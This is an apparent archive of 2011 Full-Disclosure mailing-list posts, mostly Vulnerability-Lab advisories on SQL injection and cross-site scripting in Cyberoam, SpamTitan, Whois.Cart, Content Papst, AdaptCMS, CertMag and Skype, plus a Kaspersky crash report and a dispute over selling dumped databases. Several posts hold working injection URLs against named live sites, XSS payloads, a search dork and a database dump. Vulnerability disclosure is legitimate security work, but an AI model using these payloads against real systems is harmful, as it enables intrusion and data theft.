capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure
Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability
Hi Tomy, After you wrote us now the second e-mail we want to make something very clear to u and everyone @ vs-db.info ariko-security 1. Your website is serves no point other then records of the databases that u dumped... because of the fact that you guys hack illegal into web-servers and dump the databases and do not notify the vendor. You guys tell the researchers around you that you do some security stuff ... i think you guys are just fucking criminals. Thats why nobody respects the work you do anywhere. 2. Some weeks ago another ariko-security member asked us ... why we do not work with you guys (vs-db.info ariko-security)? He also asked us multiple times for selling the dumps of hacked databases!? To answer that once more we are not interested in selling stolen information as said many times before. Why ?! Mainly due the fact that this is a *criminal *offence. And so a no go in our vision for the future of vulnerability-lab.com 3. Also if you view in context what we do vs what you do there is no way we want to work with you. *We* - *Inform *vendors - *Verify* vulnerabilities/bugs to ensure validity - Disclosure after *contact *with vendor or after multiple tries to contact the vendor - Discolsure policy - Try to *protect *vendors and customers of those vendors *You* - *Dont* inform vendor - *No* Discolsure policy - *No* verfication other then a picture - Selling of *illegally* dumped databases/information to make money 4. If so that you say that you are all that good an you are so awsome in what you do why is a 1.5 year old bug (if this infact true) still unpatched when we found it!? Sounds to me that u dumped the database then probably sold it off and then forgot all about it. Instead of contacting the vendor/webmaster etc. So clearly you have no idea of what working in security is about. Your are only trying to rape the benefits of a trick that you know. I hope that you see this as a *wake up call* and *warning* as next time we might not be as friendly. Best Regards, The Vulnerability-lab Team. Am 23.12.2011 11:32, schrieb Tomy: http://www.vs-db.info/?p=593 MAY 2010 - Nice that you can find 1.5 YEARS old hole LOL! Tomy Wiadomość napisana przez resea...@vulnerability-lab.com mailto:resea...@vulnerability-lab.com w dniu 20 gru 2011, o godz. 17:08: http://www.certmag.com/ http://www.certmag.com/read.php?in=3656m/read.php?in=3656%27 Tomy supp...@vs-db.info mailto:supp...@vs-db.info -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
Title: Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability URL: http://www.vulnerability-lab.com/get_content.php?id=129 -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cyberoam UTM Appliance - SQL Injection Vulnerability
Title: == Cyberoam UTM Appliance - SQL Injection Vulnerability Date: = 2011-12-19 References: === http://www.vulnerability-lab.com/get_content.php?id=60 VL-ID: = 60 Introduction: = Small and medium enterprises are as much at risk as large enterprises from the targeted attacks of today. They need to protect their networks effectively from external and internal threats without a large security budget. Cyberoam CR50ia, CR100ia, CR200i and CR300i are powerful identity-based unified threat management appliances, delivering comprehensive protection to small and medium enterprises (SMEs) with limited investment in financial and technical resources. Cyberoam gateway security appliance offers protection from blended threats that include virus, spam, malware, phishing, pharming. Its unique identity-based security based on Layer 8 technology protects enterprises from internal threats that lead to data theft and loss by giving complete visibility into and control over internal users. (Copy of the Vendor Homepage: http://cyberoam.com/crismes.html) Abstract: = Vulnerability-Lab Team discovered a SQL Injection Vulnerability on the Cyberoam UTM Security Appliance. Report-Timeline: 2011-12-19: Public or Non-Public Disclosure Status: Published Affected Products: == Cyberoam UTM Appliance CR300i, CR500i v10 older versions Exploitation-Technique: === Remote Severity: = Critical Details: A critical SQL Injection vulnerability is detected on the Cyberoam UTM WAF Appliance v10.x. The vulnerability allows an attacker to inject own sql statements on the affected firewall appliance dbms. Remote attackers can takeover the server and compromise the dbms appliance. Vulnerable Module(s): [+] Controller - (?mode=301tableid=[[]]sort=dir=) --- SQL Error Logs --- java.sql.SQLException: ERROR: each UNION query must have the same number of columns ... java.sql.SQLException: ERROR: UNION types character varying and integer cannot be matched ... java.sql.SQLException: ERROR: ORDER BY position 100 is not in select list java.sql.SQLException: ERROR: ORDER BY position 10 is not in select list java.sql.SQLException: ERROR: ORDER BY position 9 is not in select list http://127.0.0.1:8080/corporate/Controller?mode=301tableid=1%20order%20by%208--sort=dir= java.sql.SQLException: ERROR: ERROR: ORDER BY position 8 org.postgresql.util.PSQLException: No results were returned by the query. = Columns: 8 ... org.postgresql.util.PSQLException: No results were returned by the query. ... java.sql.SQLException: ERROR: unterminated quoted string at or near and user_id=0 ... {totalRecords:1,records:[{natprofilename: MASQ ,manage natprofileid : 1 ,isdefault :y}]} ... Affected Version(s): [+] Cyberoam UTM Appliance CR300i, CR500i v10 older versions Pictures: ../1.png ../2.png ../3.png ../4.png ../5.png ../sql_1.png ../sql_2.png ../os_exec.png Proof of Concept: = The vulnerability can be exploited by remote attackers with auth. For demonstration or reproduce ... htmlhead body titlep0c/title iframe src=http://127.0.0.1:8080/corporate/Controller?mode=301tableid=[SQL-IJ]sort=dir=INJECT width=800 height=800 /body /head /html Reference: [+] http://xxx.com/corporate/Controller?mode=301tableid=2sort=dir= --- SQL Access Log --- current user:'nobody' banner:'PostgreSQL 8.4.3 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-13), 32-bit' current database:'corporate' database management system users [1]: [*] nobody current user:'nobody' database management system users privileges: [*] nobody (administrator) [3]: privilege: catupd privilege: createdb privilege: super available databases [1]: [*] corporate Database: public [34 tables] +---+ | tblapplianceparam | | tblappliancespecificparam | | tblattributes | | tblcolumndetail | | tblcompany| | tblcrevent| | tblcrparam| | tblcrreplyparam | | tblddnsserviceprovider| | tblentity | | tblentitygrouprelation| | tblfirewallcolumns| | tblgroupcolumns | | tblicmpcode | | tblicmptype | | tblieentity
[Full-disclosure] SpamTitan v5.08 - Multiple Web Vulnerabilities
Title: == SpamTitan v5.08 - Multiple Web Vulnerabilities Date: = 2011-12-20 References: === http://www.vulnerability-lab.com/get_content.php?id=91 VL-ID: = 91 Introduction: = SpamTitan Anti Spam is a complete software solution to email security offering protection from Spam, Viruses, Trojans, Phishing and unwanted content. Feature Set * Two Anti Virus engines including ClamAV and Kaspersky Labs * Multi layered Anti Spam analyses resulting in 98% plus Spam detection * Less than 0.03% False Positive Rate * Content Filtering * Inward and outward email scanning * Email Disclaimer capability * Simple download and installation process * Plug and Play Solution * End user Spam management using email quarantine reports * Web based administrative GUI * Multiple automated reports * Automated updating including anti virus, anti spam, version releases and system backup * LDAP, Dynamic and aliases file recipient verification * Per domain administrators * Per domain reports * API * Multi node Cluster SpamTitan is available in two flavours, SpamTitan ISO and SpamTitan for VMware®, both of which can be downloaded and installed for free. (Copy of the Vendor Homepage: http://www.spamtitan.com/products) Abstract: = Vulnerability Lab Team discovered multiple Input Validation Vulnerabilities on the SpamTitan Appliance(Application). Report-Timeline: 2011-09-15: Vendor Notification 2011-12-20: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Medium Details: Multiple Input validation vulnerabilities are detected on Spamtitans security application v5.02.x. The vulnerability allows remote attackers or local low privileged user accounts to manipulate specific application requests or content. Successful exploitation can also result in session hijacking (persistent) on application-side or persistent content manipulation. Vulnerable Module(s): (Persistent) [+] Auth-Settings [+] Setup-Relay [+] setup-network Picture(s): ../ive1.png ../ive2.png ../ive3.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... File: http://www.vulnerability-lab.com:8080/auth-settings.php trtd class=taglineEmail Address:/td td input type=text name=testaddr style=width: 300px; value=INSERT PERSISTENT SCRIPTCODE HERE!!! /td /trtrtdPassword:/td td input type=password name=testpass style=width: 300px; value=INSERT PERSISTENT SCRIPTCODE HERE!!! /td File: http://www.vulnerability-lab.com:8080/setup-relay.php td input type=text name=hostname style=width: 300px; value=demo.spamtitan.com--INSERT PERSISTENT SCRIPTCODE HERE!!! /td ... or trtd class=taglineDomain:/td td input type=text name=domainname style=width: 300px; border-color: red; value=--INSERT PERSISTENT SCRIPTCODE HERE!!! /tdtd align=right input class=button type=submit style=width:85px; value=Add onclick=javascript:sform('adddomain', '', false);/td/tr trtdDestination Server:/td td input type=text name=mailserver style=width: 300px; value=--INSERT PERSISTENT SCRIPTCODE HERE!!! /td /tr File: http://www.vulnerability-lab.com:8080/setup-network.php trtd class=taglineIP Address:/td td input type=text name=ipaddress style=width: 300px; border-color: red; value=193.120.238.59--test /td td align=rightinput class=button type=submit style=width:85px; value=Save onclick=javascript:sform('ifconfig', 'Save', false); /td/trtrtd class=taglineSubnet Mask:/td td input type=text name=subnetmask style=width: 300px; value=255.255.255.248--INSERT PERSISTENT SCRIPTCODE HERE!!! /td/tr trtd class=taglineDefault Route:/td td input type=text name=defaultroute style=width: 300px; value=193.120.238.57--INSERT PERSISTENT SCRIPTCODE HERE!!! /td/tr References: http://server.com:8080/auth-settings.php http://server.com:8080/setup-relay.php http://server.com:8080/setup-network.php Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular
[Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability
Title: == CertificationMagazine - Blind SQL Injection Vulnerability Date: = 2011-12-19 VL-ID: = 269 Reference: == http://www.vulnerability-lab.com/get_content.php?id=269 Introduction: = Certification Magazine is a technical training and certification publication designed to deliver the most current information available about technical certification programs from a variety of vendors. The publication offers a comprehensive view of the market and provides information about how to obtain the certification best suited to one`s career. Certification Magazine examines career options and profiles certified professionals who lead the industry. Editorial components include: Cover stories and columns on important industry events, issues and trends; Interviews with industry leaders; Updates of requirements and benefits of specific certification programs; Listings and comments about new exams; Industry Analysis; and a compendium of industry events including Certification Magazine`s conferences and seminars. (Copy of the Vendor Website: http://www.certmag.com/aboutus.php) Abstract: = Vulnerability-Lab Team discovered a critical remote Blind SQL Injection vulnerability on the Certification Magazine website. Report-Timeline: 2011-12-19: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected on the website of Certification Magazine. Successful exploitation of the vulnerability allows an attacker to inject own sql statements/commands via parameter request of ?in= Vulneable Module(s): [+] in --- SQL Error Logs --- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `3656m/read.php?in=3656` at line 1 Pictures: ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... Reference: http://www.certmag.com/read.php?in=3656m/read.php?in=3656' PoC: Risk: = The security risk of the remote sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri B.A. Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
Title: == Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability Date: = 2011-12-19 References: === http://www.vulnerability-lab.com/get_content.php?id=129 VL-ID: = 129 Introduction: = Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you re surfing the web. It provides constant protection for you and your family – whether you work, bank, shop or play online. Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning technologies work silently in the background while you enjoy your digital life. (Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus http://www.kaspersky.com/kaspersky_internet_security) Abstract: = Vulnerability-Lab Team discovered a Memory Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 Kaspersky Anti-Virus 2011/2012. Report-Timeline: 2010-12-04: Vendor Notification 2011-01-16: Vendor Response/Feedback 2011-12-19: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Local Severity: = Medium Details: A Memory Corruption vulnerability is detected on Kaspersky Internet Security 2011/2012 Kaspersky Anti-Virus 2011/2012. The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the kaspersky exception filters, which could be exploited by attackers to crash he complete software process. The bug is located over the basegui.ppl basegui.dll when processing a .cfg file import. Vulnerable Modules: [+] CFG IMPORT Affected Version(s): Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012 KIS 2012 v12.0.0.374 KAV 2012 v12.x Kaspersky Anti-Virus 2011 Kaspersky Internet Security 2011 KIS 2011 v11.0.0.232 (a.b) KAV 11.0.0.400 KIS 2011 v12.0.0.374 Kaspersky Anti-Virus 2010 Kaspersky Internet Security 2010 --- Kaspersky Bug Logs --- Folder: ../Analyses/Crash Reports (KISKAV) KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp Reference(s): ../Analyses/Crash Reports (KISKAV)/kav_x32.rar ../Analyses/Crash Reports (KISKAV)/kis_x32-win7.zip ../Analyses/Crash Reports (KISKAV)/kis_x64.zip --- Service Crash Report Queue Logs --- Folder: ../Analyses/Crash Reports (Service) AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7 AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95 AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e AppCrash_avp.exe_5f09d49c257b515e08a6defbf11 AppCrash_avp.exe_69cb355e72347419436f047a313 AppCrash_avp.exe_69cb355e72347419436f047a313 AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977 AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327 AppCrash_avp.exe_ed94bb914e255192b71d1257c19 Version=1 EventType=APPCRASH EventTime=129256270253026260 ReportType=2 Consent=1 UploadTime=129256270260076663 ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6 IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6 WOW64=1 Response.BucketId=1985200055 Response.BucketTable=1 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=avp.exe Sig[1].Name=Anwendungsversion Sig[1].Value=11.0.1.400 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=4c2cd011 Sig[3].Name=Fehlermodulname Sig[3].Value=basegui.ppl Sig[4].Name=Fehlermodulversion Sig[4].Value=11.0.1.400 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=4c2cd193 Sig[6].Name=Ausnahmecode Sig[6].Value=c005 Sig[7].Name=Ausnahmeoffset Sig[7].Value=00079c3c DynamicSig[1].Name=Betriebsystemversion DynamicSig[1].Value=6.1.7600.2.0.0.768.3 DynamicSig[2].Name=Gebietsschema-ID DynamicSig[2].Value=1031 DynamicSig[22].Name=Zusatzinformation 1 DynamicSig[22].Value=0a9e DynamicSig[23].Name=Zusatzinformation 2 DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789 DynamicSig[24].Name=Zusatzinformation 3 DynamicSig[24].Value=0a9e DynamicSig[25].Name=Zusatzinformation 4 DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789 UI[2]=C://Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe UI[3]=Kaspersky Anti-Virus funktioniert nicht mehr UI[4]=Windows
[Full-disclosure] Whois Cart Billing - Multiple Web Vulnerabilities
Title: == Whois Cart Billing - Multiple Web Vulnerabilities Date: = 2011-12-22 References: === http://www.vulnerability-lab.com/get_content.php?id=343 VL-ID: = 343 Introduction: = Whois.Cart() is a client/administrator tool that facilitates the many tasks involved in running an efficient webhosting and domain registration business. The system will surgically undertake every aspect of your client transactions; first the sale (which is most important and most overlooked), the collection of money, the registration/transfer/renewal of domains, the provisioning of hosting space, and lastly the maintenance of all these. A cumulation of countless development hours and thousands of user suggestions, Whois.Cart() is a full-featured system that has retained the clean and simple ethic that most of its equal-featured competing products have lost. It will undoubtedly become the most natural and effective resource with which you will ever complement your business. (Copy of the Vendor Homepage: http://whoiscart.net/product.php) Abstract: = The Vulnerability Laboratory Research Team discovered multiple vulnerabilities on the Whois.Cart Hosting Billing Solution Software. Report-Timeline: 2011-11-21: Vendor Notification 2011-12-22: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple persistent input validation vulnerabilities are detected on the Whois.Cart Hosting Billing Solution Software. The vulnerability allows an remote attacker or local low privileged user account to inject persistent script code like JS/HTML. Successful exploitation can result in session hijacking, phishing persistent content manipulation. Vulnerable Module(s): [+] hostinginterfaces [+] domain ordering Picture(s): ../hostinginterfaces.png ../xss-whoiscart.png 1.2 Another vulnerability was detected on the Whois.cart Software, and it allow a remote attacker to read all the customers cPanel logins and passwords without encryption. Vulnerable Module(s): [+] cPanel Log Proof of Concept: = The vulnerability can be exploited by remote attackers with required user inter action or by local low privileged user accounts. For demonstration or reproduce ... 1.1 [*] Persistant Cross Site Scripting Vulnerable Module(s): [+] Order - Choose domain name Review: Order page trthDomain Setup(scriptalert(VLAB);/script)/ththPrice -$ 0/ththahref=' delete.php?delid=401'Delete From Cart/a/th/trtrtd colspan='3'/td/trtrthP1( scriptalert(Me!ster);/script = [x] )/ththPrice Monthly-$ 100brPrice Yearly-$ 1000/ththa href='delete.php?delid=400' Delete From Cart/a/th/trtrtd colspan='3'P1/td/tr 1.2 [*] cPanel Log Reference(s): http://www.[SERVER].com/whoiscart/admin/hostinginterfaces/cpanel_2_log.htm Risk: = The security risk of the persistent input validation vulnerabilities are estimated as High(-). The security risk of the cp log access rights are estimated as low(+). Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or
[Full-disclosure] Content Papst CMS v2011.2 - Multiple Web Vulnerabilities
Title: == Content Papst CMS v2011.2 - Multiple Web Vulnerabilities Date: = 2011-12-18 References: === http://www.vulnerability-lab.com/get_content.php?id=363 VL-ID: = 363 Introduction: = Contentpapst ist ein leistungsstarkes und sehr flexibles Content-Management-System (CMS) speziell für kleine und mittelständische Unternehmen, Behörden und Organisationen. Mit dem CMS Contentpapst verwalten Sie Ihre Firmen-Homepage, Ihre Vereins-Webseite etc. zukünftig komplett per Browser, ohne zusätzliche Software! (Copy of the Vendor Homepage: http://www.sandoba.de/produkte/cms-contentpapst/) Abstract: = Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Content Papst CMS v2011.2 Report-Timeline: 2011-12-18: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 Multiple persistent input validation vulnerabilities are detected on the famous Content Papst v2011.2 Content Management System. The vulnerability allows an remote attacker or local low privileged cp user account to inject own malicious script codes on application side (persistent) of the web service. Successful exploitation of the vulnerability can result in persistent module content manipulation of vulnerable modules, phishing session hijacking. Vulnerable Module(s): [+] Categorie = Titel/Beschreibung/Permalink [+] Links = Titel/URL/Beschreibung [+] Artikel-Categorie = Titel/Beschreibung/Permalink [+] Artikel = Titel/Beschreibung/Permalink [+] News= Name/Beschreibung/URL Picture(s): ../1.png ../2.png 1.2 Multiple non-persistent cross site scripting vulnerabilities are detected on the famous Content Papst v2011.2 Content Management System. The vulnerability allows an attacker (remote) to hijack customer/admin/moderator/user accounts via cross site scripting. Successful exploitation of the vulnerability can result in account steal client side content manipulation on requests. Vulnerable Module(s): [+] Dateiverwaltung - Topic [Name,Path Folder] [+] News - Search Parameter Picture(s): ../3.png 1.3 A Information/Path disclosure issue are detected on the famous Content Papst v2011.2 Content Management System. A regular expression format output displays mistake shows remote attackers sensitive information via path error. Vulnerable Module(s): [+] Search File Overview --- Exception Logs --- bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter \/ found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php/b on line b563/bbr bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php/b on line b563/bbr bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php/b on line b563/bbr bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php/b on line b563/bbr bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php/b on line b563/bbr bWarning/b: preg_match() [a href=function.preg-matchfunction.preg-match/a]: No ending delimiter found in b/kunden/282246_12XXX/cms-test.com/demoversion/modules Picture(s): ../4.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... 1.1 - Title Beschreibung - Categories tr class=layout_table_row_1 th valign=top3/th td valign=top width=150a href=/demoversion/admin.php?file=newsmode=edit_category ;number=3hacker23 iframe src=http://vulnerability-lab.com width=1000 height=800 /a/td td valign=topemKeine Beschreibung verfügbar./em/td td width=130 valign=topÖffentlich verfügbar/td td valign=topa href=http://www.XXX.com/[PATH]/news-category-3.html; title=Zur Webseite wechselnimg
[Full-disclosure] Adapt CMS v2.0.1 - SQL Injection Vulnerability
Title: == Adapt CMS v2.0.1 - SQL Injection Vulnerability Date: = 2011-11-25 References: === http://www.vulnerability-lab.com/get_content.php?id=341 VL-ID: = 341 Introduction: = AdaptCMS is brought to you by Insane Visions, with the v2.0.1 versions being the first big step in the new generation of software being released by Insane Visions. AdaptCMS is a long-term development of an idea that started as a gaming CMS where you can easily control your website (OneCMS), to being useable on any content website. The AdaptCMS system has always strived to provide that along with great support, continued updates and just a great CMS altogether. With the 1.x expiring soon, the 2.x series will pickup as a free-only script (GPL) being completely re-written, brand new design and more possibilities. (Copy of the Vendor Homepage: http://www.adaptcms.com/page/34/about) Abstract: = A Vulnerability-Lab researcher discovered a critical SQL Injection vulnerability on the AdaptCMS v2.0.1 Report-Timeline: 2011-11-25: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A SQL Injection vulnerability is detected on the AdaptCMS v2.0.1! The bug allows an remote attacker to inject/execute own sql statements over the vulnerable param request. Successful exploitation of the bug can lead to dbms cms compromise. Vulnerable Module(s): [+] article Vulnerable Param(s): [+] Page ID Pictures: ../adapt.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... PoC: http://site/AdaptCMS Installation Path/article/'Article ID/Page Name/Article Title Errors: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 262 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 293 Full: (examples) http://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update Dorks : intext:Powered by AdaptCMS OR Powered by AdaptCMS Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Research Laboratory - X-Cisadane Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari, Anharku, Array XCrew, Remick Kuzmanovic Vulnerability Researcher Profile: http://www.vulnerability-lab.com/show.php?user=X-Cisadane Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype Vendor Website - Cross Site Scripting Vulnerability
Title: == Skype Vendor Website - Cross Site Scripting Vulnerability Date: = 2011-11-11 References: === http://www.vulnerability-lab.com/get_content.php?id=309 VL-ID: = 309 Introduction: = Skype is a software application that allows users to make voice and video calls and chats over the Internet. Calls to other users within the Skype service are free, while calls to both traditional landline telephones and mobile phones can be made for a fee using a debit-based user account system. Skype has also become popular for its additional features which include instant messaging, file transfer, and videoconferencing. Skype has 663 million registered users as of 2010. The network is operated by Skype Limited, which has its headquarters in Luxembourg. Most of the development team and 44% of the overall employees of Skype are situated in the offices of Tallinn and Tartu, Estonia. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype) Abstract: = The Vulnerability-Lab Team discovered a cross site scripting vulnerability on the Skype main vendor website. Report-Timeline: 2011-11-04: Vendor Notification 2011-11-05: Vendor Response/Feedback 2011-11-10: Vendor Fix/Patch 2011-11-11: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Low Details: A non-persistent cross site scripting vulnerability is detected on the Skype vendor website. The vulnerability allows remote attackers to hijack skype customer sessions via cross site scripting. Successful exploitation of the client-side vulnerability can result in session hijacking account steal. Vulnerable Module(s): [+] Subscriptions to call a single country Affected Module(s): [+] Skype.com Picture(s): ../ive1.png ../ive2.png ../ive3.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers on client-side via required user inter action. For demonstration or reproduce ... PoC: img src=tester1337.png onerror=alert(CROSS-SITE-SCRIPTING) / Reference(s): www.skype.com/intl/en/prices/pay-monthly-new Risk: = The security risk of the non persistent cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Research Laboratory - Aditya Gupta Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: 